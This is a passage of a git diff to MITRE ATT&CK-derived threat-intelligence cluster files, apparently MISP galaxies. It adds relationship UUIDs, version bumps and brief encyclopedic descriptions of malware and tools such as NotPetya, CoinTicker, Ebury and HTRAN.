"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "454fe82d-6fd2-4ac6-91ab-28a33fe01369", + "value": "HOPLIGHT - S0376" + }, + { + "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though [NotPetya](https://attack.mitre.org/software/S0368) presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)", + "meta": { + "external_id": "S0368", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0368", + "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://www.us-cert.gov/ncas/alerts/TA17-181A" + ], + "synonyms": [ + "NotPetya", + "GoldenEye", + "Petrwrap", + "Nyetya" + ] + }, + "related": [ + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "5719af9d-6b16-46f9-9b28-fb019541ddbb", + "value": "NotPetya - S0368" + }, + { + "description": "[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)", + "meta": { + "external_id": "S0369", + "mitre_platforms": [ + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0369", + "https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/" + ], + "synonyms": [ + "CoinTicker" + ] + }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6fb6408c-0db3-41d9-a3a1-a32e5f16454e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "d1531eaa-9e17-473e-a680-3298469662c3", + "value": "CoinTicker - S0369" + }, + { + "description": "[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)", + "meta": { + "external_id": "S0377", + "mitre_platforms": [ + "Linux" + ], + "refs": [ + "https://attack.mitre.org/software/S0377", + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", + "https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/" + ], + "synonyms": [ + "Ebury" + ] + }, + "related": [ + { + "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54456690-84de-4538-9101-643e26437e09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "d6b3fcd0-1c86-4350-96f0-965ed02fcc51", + "value": "Ebury - S0377" } ], - "version": 12 + "version": 14 } diff --git a/clusters/mitre-mobile-attack-attack-pattern.json b/clusters/mitre-mobile-attack-attack-pattern.json index f634fb8..c0a9a6f 100644 --- a/clusters/mitre-mobile-attack-attack-pattern.json +++ b/clusters/mitre-mobile-attack-attack-pattern.json @@ -1670,5 +1670,5 @@ "value": "Malicious Software Development Tools - MOB-T1065" } ], - "version": 4 + "version": 5 } diff --git a/clusters/mitre-mobile-attack-course-of-action.json b/clusters/mitre-mobile-attack-course-of-action.json index 32e4b1d..81b31ae 100644 --- a/clusters/mitre-mobile-attack-course-of-action.json +++ b/clusters/mitre-mobile-attack-course-of-action.json @@ -304,5 +304,5 @@ "value": "Encrypt Network Traffic - MOB-M1009" } ], - "version": 5 + "version": 6 } diff --git a/clusters/mitre-mobile-attack-malware.json b/clusters/mitre-mobile-attack-malware.json index 1c59431..8697db8 100644 --- a/clusters/mitre-mobile-attack-malware.json +++ b/clusters/mitre-mobile-attack-malware.json @@ -609,6 +609,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4bf6ba32-4165-42c1-b911-9c36165891c8", @@ -740,6 +747,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "41e3fd01-7b83-471f-835d-d2b1dc9a770c", @@ -1103,5 +1117,5 @@ "value": "XcodeGhost - MOB-S0013" } ], - "version": 7 + "version": 8 } diff --git a/clusters/mitre-pre-attack-attack-pattern.json b/clusters/mitre-pre-attack-attack-pattern.json index ac865ae..66fd09b 100644 --- a/clusters/mitre-pre-attack-attack-pattern.json +++ b/clusters/mitre-pre-attack-attack-pattern.json @@ -2785,5 +2785,5 @@ "value": "Data Hiding - PRE-T1097" } ], - "version": 5 + "version": 6 } diff --git a/clusters/mitre-pre-attack-intrusion-set.json b/clusters/mitre-pre-attack-intrusion-set.json index ca083fe..ba875c6 100644 --- a/clusters/mitre-pre-attack-intrusion-set.json +++ b/clusters/mitre-pre-attack-intrusion-set.json @@ -263,6 +263,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6a2e693f-24e5-451a-9f88-b36a108e5662", @@ -296,6 +303,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", @@ -355,5 +369,5 @@ "value": "APT17 - G0025" } ], - "version": 7 + "version": 8 } diff --git a/clusters/mitre-tool.json b/clusters/mitre-tool.json index 988757b..c64f5e9 100644 --- a/clusters/mitre-tool.json +++ b/clusters/mitre-tool.json @@ -111,7 +111,7 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -124,104 +124,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -229,62 +131,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ @@ -292,13 +138,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -306,34 +145,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ @@ -342,7 +153,84 @@ "type": "uses" }, { - "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -356,7 +244,119 @@ "type": "uses" }, { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -460,14 +460,14 @@ "type": "uses" }, { - "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d", + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -480,13 +480,6 @@ ], "type": "uses" }, - { - "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe", "tags": [ @@ -494,26 +487,33 @@ ], "type": "uses" }, - { - "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "value": "Mimikatz - S0002" }, { - "description": "[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)", + "description": "[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)", "meta": { "external_id": "S0040", "mitre_platforms": [ @@ -522,7 +522,8 @@ ], "refs": [ "https://attack.mitre.org/software/S0040", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", + "https://s3.eu-west-1.amazonaws.com/ncsc-content/files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf" ], "synonyms": [ "HTRAN", @@ -543,6 +544,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "d5e96a35-7b0b-4c6a-9533-d63ecbda563e", @@ -818,6 +833,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "38952eac-cb1b-4a71-bad2-ee8223a1c8fe", @@ -865,14 +887,14 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -955,6 +977,13 @@ ], "type": "uses" }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ @@ -968,13 +997,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", @@ -1032,14 +1054,7 @@ }, "related": [ { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1052,6 +1067,13 @@ ], "type": "uses" }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ @@ -1059,48 +1081,6 